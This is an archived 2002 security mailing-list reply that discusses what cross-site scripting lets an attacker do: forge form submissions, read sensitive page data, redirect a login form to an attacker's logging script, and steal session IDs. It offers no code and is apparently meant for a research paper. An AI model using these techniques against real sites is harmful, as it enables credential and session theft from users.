Vulnerability Development mailing list archives
Re: CSS implication
From: "b0iler _" <b0iler () hotmail com>
Date: Tue, 19 Mar 2002 14:45:31 -0700
Although very simular to XSS writting SSI, PHP, or any other kind of server side language is not XSS, but rather a remote file writting vulnerability. The difference is there and I don't feel we should confuse the two. I am not sure if you would call client side scriptting that is saved to a file on the server XSS, but I personally do not count it as such.
Here is a few other things for your paper.you can redirect the user to a url or submit form data. very dangerous if the user is allowed to do things like change their password when they are logged in without having to supply their password. session theft.
read field data or html. can be dangerous if a users password, credit card number, real name, or other sensitive information is printted to the same page(s) the XSS has access to.
you can change the html of a page. dangerous for example if the user is supposed to input their username and password, you can change where the form is sent, making it instead a logging script set up on your server.
Matt Priestley mentioned session theft. Which was what most of these have have to deal with, also you can grab the current url. Which can sometimes hold sensitive info - usernames, passwords, session ids, etc.
_________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com
Current thread:
- Re: CSS implication, (continued)
- Re: CSS implication Jeremiah Grossman (Mar 16)
- Re: CSS implication Frog Man (Mar 17)
- Re: CSS implication Bill Weiss (Mar 17)
- Re: CSS implication zero (Mar 17)
- Re: CSS implication Jeremiah Grossman (Mar 18)
- Re: CSS implication zero (Mar 18)
- Re: CSS implication Jeremiah Grossman (Mar 19)
- Re: CSS implication Sverre H. Huseby (Mar 23)
- Re: CSS implication Jeremiah Grossman (Mar 18)
- Re: CSS implication Arta (Mar 18)
- Re: CSS implication HarryM (Mar 21)
- Re: CSS implication Sverre H. Huseby (Mar 21)